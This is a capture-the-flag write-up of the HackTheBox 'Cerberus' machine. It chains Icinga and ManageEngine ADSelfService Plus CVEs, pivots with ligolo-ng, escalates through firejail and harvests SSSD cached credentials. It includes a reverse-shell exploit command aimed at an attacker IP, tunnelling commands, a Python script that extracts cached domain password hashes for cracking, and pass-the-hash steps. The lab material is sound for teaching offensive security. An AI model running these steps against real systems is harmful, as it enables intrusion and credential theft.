CTF-Writeups/HackTheBox/Cerberus.md
2023-07-31 19:35:25 +03:00


HackTheBox - Cerberus

NMAP

```
Nmap scan report for 10.10.11.205
Host is up (0.093s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Did not follow redirect to http://icinga.cerberus.local:8080/icingaweb2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods: 
```

Visiting the web server on port 8080 redirects us to icinga.cerberus.local.

Add the domain to the /etc/hosts file.

PORT 8080 (HTTP)

Trying the Icinga default creds icingaadmin:icing fails.

Looking for exploits related to Icinga 2, there is an Arbitrary File Disclosure (CVE-2022-24716): https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py

The web server is hosted on Ubuntu, which we can confirm from the Server response header.

Through the file disclosure we can get the DB creds for icingaweb2, which allowed us to log in to the Icinga dashboard as `matthew`.

We can use CVE-2022-24715 to get a reverse shell; before using it we need to generate a PEM key file (passed as ./id_rsa below).

https://github.com/JacobEbben/CVE-2022-24715

```
python3 ./RCE.py -t http://icinga.cerberus.local:8080/icingaweb2 -I 10.10.14.98 -P 2222 -u 'matthew' -p 'IcingaWebPassword2023' -e ./id_rsa
```

Checking the `/etc/hosts` file, there is a host `DC.cerberus.local` on `172.16.22.1`.

To pivot we can use ligolo-ng; first we need a little setup for the tun interface on the attacking machine:

```
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.22.0/24 dev ligolo
```

Then on the attacking machine run the proxy:

```
./proxy -selfcert
```

And on the target machine run the agent:

```
agent -connect 10.10.14.98:11601 -ignore-cert -retry
```

After running the agent, we get a connection back on our machine.

Scanning the DC for common ports showed only port 5985 (WinRM) open.

Running linpeas shows firejail as an unknown SUID binary.

Searching for firejail exploits, there is a local privilege escalation CVE, CVE-2022-31214:

https://gist.github.com/GugSaas/9fb3e59b3226e8073b3f8692859f8d25

As root we have read access to /etc/krb5.keytab.

But we can't really do anything with this account. From the linpeas output we also see SSSD, the System Security Services Daemon, which handles Kerberos tickets on Linux:

Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.[3] On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for Pass the Ticket

But there wasn't any /var/lib/sss/secrets/.secrets.mkey file on the Linux machine. Instead, while researching where the AD cached credentials or hashes might be, I found a Metasploit module which explains how it gathers the AD credentials on a Linux machine.

So here we have the SSSD cache file.

We can transfer it to our machine and run tdbdump on it:

```
tdbdump ./cache_cerberus.local.ldb
```

Here we can find the hash for the matthew user:

```
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0
```

Which cracks to 147258369.
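Picking the hash out of the tdbdump output by hand works for one user, but a domain-joined host can cache a hash for every user who has logged in, which is also what a defender auditing such a host wants to know. The script below is an added example for this writeup; it is not code from the original post or from SSSD, tdbdump or Metasploit. It assumes the input is the text tdbdump prints for an SSSD cache_<domain>.ldb file (brace-wrapped records, each with a `key(...) = "..."` line holding the LDB DN and a `data(...) = "..."` line holding the attributes, with non-printable bytes escaped as a backslash followed by octal digits), walks every record, keeps only user entries that carry a sha512crypt value, and emits `user:hash` lines for john or hashcat. The sample dump is constructed in that shape around the hash recovered above.

```python
"""Pull cached domain credentials out of an SSSD cache dump (added example)."""
import re
from typing import Dict, List

# glibc sha512crypt: $6$[rounds=N$]<salt, up to 16 chars>$<86 hash chars>
SHA512CRYPT = re.compile(
    r"\$6\$(?:rounds=\d+\$)?[./A-Za-z0-9]{1,16}\$[./A-Za-z0-9]{86}")
# SSSD keeps users under a DN of the form NAME=<user>@<domain>,CN=USERS,...
USER_DN = re.compile(r"NAME=([^@,]+)@([^,]+),CN=USERS", re.IGNORECASE)
# One tdbdump record is everything between a pair of braces
RECORD = re.compile(r"\{(.*?)\}", re.DOTALL)
KEY_LINE = re.compile(r'key\(\d+\) = "([^"]*)"')

# Constructed sample in tdbdump's shape: a user with a cached hash (the hash
# recovered in the writeup), a group, and a user with no cached password.
SAMPLE_DUMP = r'''
{
key(66) = "DN=NAME=MATTHEW@CERBERUS.LOCAL,CN=USERS,CN=CERBERUS.LOCAL,CN=SYSDB"
data(300) = "\00\00\00\00name\00\00\00matthew@cerberus.local\00cachedPassword\00$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0\00cachedPasswordType\001\00"
}
{
key(71) = "DN=NAME=DOMAIN USERS@CERBERUS.LOCAL,CN=GROUPS,CN=CERBERUS.LOCAL,CN=SYSDB"
data(80) = "\00name\00domain users@cerberus.local\00gidNumber\001795000513\00"
}
{
key(64) = "DN=NAME=GUEST@CERBERUS.LOCAL,CN=USERS,CN=CERBERUS.LOCAL,CN=SYSDB"
data(60) = "\00name\00guest@cerberus.local\00uidNumber\001795000501\00"
}
'''


def cached_credentials(dump_text: str) -> Dict[str, List[str]]:
    """Map each user whose record holds a cached hash to the hashes found there."""
    found: Dict[str, List[str]] = {}
    for rec in RECORD.finditer(dump_text):
        body = rec.group(1)
        key = KEY_LINE.search(body)
        if key is None:
            continue
        who = USER_DN.search(key.group(1))
        if who is None:
            continue  # groups, services and config records: nothing cached here
        user = f"{who.group(1).lower()}@{who.group(2).lower()}"
        hashes = SHA512CRYPT.findall(body)
        if hashes:
            found.setdefault(user, []).extend(hashes)
    return found


def john_lines(creds: Dict[str, List[str]]) -> List[str]:
    """Render user:hash lines; the hash type is sha512crypt (hashcat mode 1800)."""
    return [f"{user}:{h}" for user, hashes in creds.items() for h in hashes]


if __name__ == "__main__":
    # Replace SAMPLE_DUMP with the real tdbdump output to use this on a cache file.
    for line in john_lines(cached_credentials(SAMPLE_DUMP)):
        print(line)
```

Only `CN=USERS` entries are considered, so group and service records are skipped even if a stray hash-looking string appeared in them; a user whose record has no `cachedPassword` simply does not show up, which on a real host tells you which accounts have never cached a password there.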

With the DC's port 5985 reachable through ligolo-ng, we can try authenticating as the matthew user:

```
evil-winrm -i 172.16.22.1 -u 'matthew' -p '147258369'
```

And we have access to the DC as the matthew user. Going into the C:\Users directory, there is an ADFS service account, so we might be dealing with SAML.

Transfer and run sharphound.exe to enumerate the domain.

Through evil-winrm we can use `download` to transfer the zip file to our machine.

Upload the JSON files to the BloodHound GUI.

But in BloodHound I didn't see a path leading anywhere. Pivoting from the DC machine, only port 5985 was exposed, so maybe there are other services running on the DC.

Now scanning the DC's IP:

We can see port 8888 open. Accessing port 8888 redirects to port 9521, which then redirects to dc.cerberus.local.

After logging in with matthew's creds it redirects us to dc, so add dc to the hosts file as well.

This brings us to ADSelfService Plus, but we are not authorized to view anything here. ADSelfService Plus is designed to help IT administrators enable end-users to reset forgotten passwords, unlock their accounts, and update their personal information in Active Directory (AD) without the need for IT assistance.

There is a remote code execution CVE for ADSelfService Plus (CVE-2022-47966):

https://github.com/horizon3ai/CVE-2022-47966

The issuer URL is explained in this article:

https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-fed-saml-idp

In this scenario the issuer URL is http://dc.cerberus.local/adfs/services/trust. I tried running the Python script, but for some reason it didn't work and I couldn't understand why.

So instead, use the Metasploit module: https://www.rapid7.com/db/modules/exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966/

Now we can dump NTDS either by transferring mimikatz or by creating a new administrator user and dumping the creds through secretsdump (this is just an extra step; there is no need for it, as you already have a shell as the SYSTEM user).

Having the administrator's hash, we can pass the hash to get a shell as the administrator through WinRM.
